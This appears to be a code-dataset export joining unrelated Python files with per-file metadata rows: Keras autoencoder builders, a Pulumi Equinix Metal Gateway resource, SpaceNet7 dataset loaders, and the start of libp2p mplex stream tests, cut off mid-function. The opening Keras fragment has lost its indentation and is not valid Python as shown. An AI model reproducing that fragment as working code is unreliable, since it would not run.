x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def AtrousEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same',dilation_rate=idx+1)(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.BatchNormalization()(x)
# if idx==1:
# residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=3,padding='same')(self.Encoder_Input)
# residual=keras.layers.MaxPool2D((4,4))(residual)
# x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Ouput_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def AtrousDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same',dilation_rate=len(self.kernel_size)-idx)(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
x=keras.layers.BatchNormalization()(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
# self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def BuildAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.Encoder()
AutoEncoder_.Decoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildDropOutAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.DropOutEncoder()
AutoEncoder_.DropOutDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildResidualConnectionAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.ResidualConnectionEncoder()
AutoEncoder_.ResidualConnectionDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildAtrousAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.AtrousEncoder()
AutoEncoder_.AtrousDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def AutoEncoderTraining(Model,epochs,inputs_train,outputs_train,inputs_validation,outputs_validation,save_path_name):
callbacks_list=[keras.callbacks.ModelCheckpoint(filepath=save_path_name+'.h5',monitor='val_loss',save_best_only=True),\
keras.callbacks.TensorBoard(log_dir='./TensorBoard',histogram_freq=1,write_graph=True,write_images=True)]
history=Model.fit(inputs_train,outputs_train,epochs=epochs,batch_size=64,callbacks=callbacks_list,validation_data=(inputs_validation,outputs_validation))
test_loss=Model.evaluate(inputs_validation,outputs_validation)
return history,test_loss,Model
| 60.425121
| 223
| 0.70291
| 1,592
| 12,508
| 5.380653
| 0.087312
| 0.088606
| 0.067243
| 0.03187
| 0.867733
| 0.865165
| 0.85816
| 0.854424
| 0.850222
| 0.850222
| 0
| 0.021176
| 0.150544
| 12,508
| 206
| 224
| 60.718447
| 0.785035
| 0.095139
| 0
| 0.754717
| 0
| 0
| 0.0521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08805
| false
| 0
| 0.006289
| 0
| 0.132075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac6cb36cb38e4278f94e8ec499ce8b27019a19d3
| 17,087
|
py
|
Python
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-01-08T21:57:33.000Z
|
2021-01-08T21:57:33.000Z
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 33
|
2020-12-23T21:37:39.000Z
|
2022-03-25T19:23:17.000Z
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-01-08T21:24:44.000Z
|
2021-01-08T21:24:44.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GatewayArgs', 'Gateway']
@pulumi.input_type
class GatewayArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
vlan_id: pulumi.Input[str],
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Gateway resource.
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "vlan_id", vlan_id)
if ip_reservation_id is not None:
pulumi.set(__self__, "ip_reservation_id", ip_reservation_id)
if private_ipv4_subnet_size is not None:
pulumi.set(__self__, "private_ipv4_subnet_size", private_ipv4_subnet_size)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> pulumi.Input[str]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
@vlan_id.setter
def vlan_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vlan_id", value)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@ip_reservation_id.setter
def ip_reservation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_reservation_id", value)
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@private_ipv4_subnet_size.setter
def private_ipv4_subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_ipv4_subnet_size", value)
@pulumi.input_type
class _GatewayState:
def __init__(__self__, *,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Gateway resources.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] state: Status of the gateway resource
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
if ip_reservation_id is not None:
pulumi.set(__self__, "ip_reservation_id", ip_reservation_id)
if private_ipv4_subnet_size is not None:
pulumi.set(__self__, "private_ipv4_subnet_size", private_ipv4_subnet_size)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if vlan_id is not None:
pulumi.set(__self__, "vlan_id", vlan_id)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@ip_reservation_id.setter
def ip_reservation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_reservation_id", value)
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@private_ipv4_subnet_size.setter
def private_ipv4_subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_ipv4_subnet_size", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
Status of the gateway resource
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
@vlan_id.setter
def vlan_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vlan_id", value)
class Gateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Use this resource to create Metal Gateway resources in Equinix Metal.
## Example Usage
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN with a private IPv4 block with 8 IP addresses
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
private_ipv4_subnet_size=8)
```
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN and reserved IP address block
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_reserved_ip_block = equinix_metal.ReservedIpBlock("testReservedIpBlock",
project_id=local["project_id"],
metro="sv",
quantity=2)
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
ip_reservation_id=test_reserved_ip_block.id)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GatewayArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Use this resource to create Metal Gateway resources in Equinix Metal.
## Example Usage
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN with a private IPv4 block with 8 IP addresses
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
private_ipv4_subnet_size=8)
```
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN and reserved IP address block
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_reserved_ip_block = equinix_metal.ReservedIpBlock("testReservedIpBlock",
project_id=local["project_id"],
metro="sv",
quantity=2)
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
ip_reservation_id=test_reserved_ip_block.id)
```
:param str resource_name: The name of the resource.
:param GatewayArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GatewayArgs.__new__(GatewayArgs)
__props__.__dict__["ip_reservation_id"] = ip_reservation_id
__props__.__dict__["private_ipv4_subnet_size"] = private_ipv4_subnet_size
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if vlan_id is None and not opts.urn:
raise TypeError("Missing required property 'vlan_id'")
__props__.__dict__["vlan_id"] = vlan_id
__props__.__dict__["state"] = None
super(Gateway, __self__).__init__(
'equinix-metal:index/gateway:Gateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None) -> 'Gateway':
"""
Get an existing Gateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] state: Status of the gateway resource
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GatewayState.__new__(_GatewayState)
__props__.__dict__["ip_reservation_id"] = ip_reservation_id
__props__.__dict__["private_ipv4_subnet_size"] = private_ipv4_subnet_size
__props__.__dict__["project_id"] = project_id
__props__.__dict__["state"] = state
__props__.__dict__["vlan_id"] = vlan_id
return Gateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> pulumi.Output[Optional[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> pulumi.Output[Optional[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
Status of the gateway resource
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> pulumi.Output[str]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
| 43.700767
| 201
| 0.650026
| 2,187
| 17,087
| 4.806584
| 0.078189
| 0.064878
| 0.062595
| 0.079909
| 0.843798
| 0.826484
| 0.808314
| 0.788432
| 0.782439
| 0.767409
| 0
| 0.010159
| 0.256862
| 17,087
| 390
| 202
| 43.812821
| 0.817688
| 0.392813
| 0
| 0.630208
| 1
| 0
| 0.107894
| 0.034049
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.005208
| 0.026042
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac710710dd13ab1f6fe0b43d6c52e17e05897eaa
| 7,197
|
py
|
Python
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 38
|
2021-02-18T07:04:54.000Z
|
2022-03-22T15:31:06.000Z
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 2
|
2021-02-22T18:53:19.000Z
|
2021-06-22T20:28:06.000Z
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 15
|
2021-02-25T17:25:40.000Z
|
2022-01-31T16:59:32.000Z
|
import json
import numpy as np
from skimage import io
from torch.utils.data import Dataset
class SpaceNet7Dataset(Dataset):
CLASSES = [
'building_footprint', # 1st (R) channel in mask
'building_boundary', # 2nd (G) channel in mask
'building_contact', # 3rd (B) channel in mask
]
def __init__(self,
config,
data_list,
augmentation=None,
preprocessing=None):
"""[summary]
Args:
config ([type]): [description]
data_list ([type]): [description]
augmentation ([type], optional): [description]. Defaults to None.
preprocessing ([type], optional): [description]. Defaults to None.
"""
# generate full path to image/label files
self.image_paths, self.mask_paths = [], []
for data in data_list:
self.image_paths.append(data['image_masked'])
self.mask_paths.append(data['building_mask'])
# path to previous frame
if config.INPUT.CONCAT_PREV_FRAME:
self.image_prev_paths = []
for data in data_list:
self.image_prev_paths.append(data['image_masked_prev'])
# path to next frame
if config.INPUT.CONCAT_NEXT_FRAME:
self.image_next_paths = []
for data in data_list:
self.image_next_paths.append(data['image_masked_next'])
# convert str names to class values on masks
classes = config.INPUT.CLASSES
if not classes:
# if classes is empty, use all classes
classes = self.CLASSES
self.class_values = [self.CLASSES.index(c) for c in classes]
self.device = config.MODEL.DEVICE
self.augmentation = augmentation
self.preprocessing = preprocessing
self.in_channels = config.MODEL.IN_CHANNELS
assert self.in_channels in [3, 4]
self.concat_prev_frame = config.INPUT.CONCAT_PREV_FRAME
self.concat_next_frame = config.INPUT.CONCAT_NEXT_FRAME
def __getitem__(self, i):
"""[summary]
Args:
i ([type]): [description]
Returns:
[type]: [description]
"""
image = io.imread(self.image_paths[i])
mask = io.imread(self.mask_paths[i])
if self.in_channels == 3:
# remove alpha channel
image = image[:, :, :3]
_, _, c = image.shape
assert c == self.in_channels
# concat previous frame
if self.concat_prev_frame:
image_prev = io.imread(self.image_prev_paths[i])
if self.in_channels == 3:
image_prev = image_prev[:, :, :3]
_, _, c = image_prev.shape
assert c == self.in_channels
image = np.concatenate([image_prev, image], axis=2)
# concat next frame
if self.concat_next_frame:
image_next = io.imread(self.image_next_paths[i])
if self.in_channels == 3:
image_next = image_next[:, :, :3]
_, _, c = image_next.shape
assert c == self.in_channels
image = np.concatenate([image, image_next], axis=2)
# extract certain classes from mask
masks = [(mask[:, :, v] > 0) for v in self.class_values]
mask = np.stack(masks,
axis=-1).astype('float') # XXX: multi class setting.
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=image, mask=mask)
image, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image, mask=mask)
image, mask = sample['image'], sample['mask']
return image, mask
def __len__(self):
"""[summary]
Returns:
[type]: [description]
"""
return len(self.image_paths)
class SpaceNet7TestDataset(Dataset):
def __init__(self,
config,
data_list,
augmentation=None,
preprocessing=None):
"""[summary]
Args:
config ([type]): [description]
data_list ([type]): [description]
augmentation ([type], optional): [description]. Defaults to None.
preprocessing ([type], optional): [description]. Defaults to None.
"""
# generate full path to image/label files
self.image_paths = []
for data in data_list:
self.image_paths.append(data['image_masked'])
# path to previous frame
if config.INPUT.CONCAT_PREV_FRAME:
self.image_prev_paths = []
for data in data_list:
self.image_prev_paths.append(data['image_masked_prev'])
# path to next frame
if config.INPUT.CONCAT_NEXT_FRAME:
self.image_next_paths = []
for data in data_list:
self.image_next_paths.append(data['image_masked_next'])
self.device = config.MODEL.DEVICE
self.augmentation = augmentation
self.preprocessing = preprocessing
self.in_channels = config.MODEL.IN_CHANNELS
assert self.in_channels in [3, 4]
self.concat_prev_frame = config.INPUT.CONCAT_PREV_FRAME
self.concat_next_frame = config.INPUT.CONCAT_NEXT_FRAME
def __getitem__(self, i):
"""[summary]
Args:
i ([type]): [description]
Returns:
[type]: [description]
"""
image_path = self.image_paths[i]
image = io.imread(image_path)
if self.in_channels == 3:
# remove alpha channel
image = image[:, :, :3]
_, _, c = image.shape
assert c == self.in_channels
# concat previous frame
if self.concat_prev_frame:
image_prev = io.imread(self.image_prev_paths[i])
if self.in_channels == 3:
image_prev = image_prev[:, :, :3]
_, _, c = image_prev.shape
assert c == self.in_channels
image = np.concatenate([image_prev, image], axis=2)
# concat next frame
if self.concat_next_frame:
image_next = io.imread(self.image_next_paths[i])
if self.in_channels == 3:
image_next = image_next[:, :, :3]
_, _, c = image_next.shape
assert c == self.in_channels
image = np.concatenate([image, image_next], axis=2)
original_shape = image.shape
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=image)
image = sample['image']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image)
image = sample['image']
return {
'image': image,
'image_path': image_path,
'original_shape': original_shape,
}
def __len__(self):
"""[summary]
Returns:
[type]: [description]
"""
return len(self.image_paths)
| 31.291304
| 78
| 0.561901
| 792
| 7,197
| 4.886364
| 0.135101
| 0.046512
| 0.057881
| 0.021705
| 0.80801
| 0.799742
| 0.799742
| 0.798191
| 0.798191
| 0.798191
| 0
| 0.005657
| 0.336807
| 7,197
| 229
| 79
| 31.427948
| 0.805154
| 0.180353
| 0
| 0.723077
| 0
| 0
| 0.038818
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 1
| 0.046154
| false
| 0
| 0.030769
| 0
| 0.130769
| 0.007692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bc8bc1c8d156d0405e748965301100f567c58c7
| 7,162
|
py
|
Python
|
tests/stream_muxer/test_mplex_stream.py
|
g-r-a-n-t/py-libp2p
|
36a4a9150dcc53b42315b5c6868fccde5083963b
|
[
"Apache-2.0",
"MIT"
] | 315
|
2019-02-13T01:29:09.000Z
|
2022-03-28T13:44:07.000Z
|
tests/stream_muxer/test_mplex_stream.py
|
pipermerriam/py-libp2p
|
379a157d6b67e86a616b2458af519bbe5fb26a51
|
[
"Apache-2.0",
"MIT"
] | 249
|
2019-02-22T05:00:07.000Z
|
2022-03-29T16:30:46.000Z
|
tests/stream_muxer/test_mplex_stream.py
|
ralexstokes/py-libp2p
|
5144ab82894623969cb17baf0d4c64bd0a274068
|
[
"Apache-2.0",
"MIT"
] | 77
|
2019-02-24T19:45:17.000Z
|
2022-03-30T03:20:09.000Z
|
import pytest
import trio
from trio.testing import wait_all_tasks_blocked
from libp2p.stream_muxer.mplex.exceptions import (
MplexStreamClosed,
MplexStreamEOF,
MplexStreamReset,
)
from libp2p.stream_muxer.mplex.mplex import MPLEX_MESSAGE_CHANNEL_SIZE
from libp2p.tools.constants import MAX_READ_LEN
DATA = b"data_123"
@pytest.mark.trio
async def test_mplex_stream_read_write(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
assert (await stream_1.read(MAX_READ_LEN)) == DATA
@pytest.mark.trio
async def test_mplex_stream_full_buffer(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
# Test: The message channel is of size `MPLEX_MESSAGE_CHANNEL_SIZE`.
# It should be fine to read even there are already `MPLEX_MESSAGE_CHANNEL_SIZE`
# messages arriving.
for _ in range(MPLEX_MESSAGE_CHANNEL_SIZE):
await stream_0.write(DATA)
await wait_all_tasks_blocked()
# Sanity check
assert MAX_READ_LEN >= MPLEX_MESSAGE_CHANNEL_SIZE * len(DATA)
assert (await stream_1.read(MAX_READ_LEN)) == MPLEX_MESSAGE_CHANNEL_SIZE * DATA
# Test: Read after `MPLEX_MESSAGE_CHANNEL_SIZE + 1` messages has arrived, which
# exceeds the channel size. The stream should have been reset.
for _ in range(MPLEX_MESSAGE_CHANNEL_SIZE + 1):
await stream_0.write(DATA)
await wait_all_tasks_blocked()
with pytest.raises(MplexStreamReset):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_pair_read_until_eof(mplex_stream_pair):
read_bytes = bytearray()
stream_0, stream_1 = mplex_stream_pair
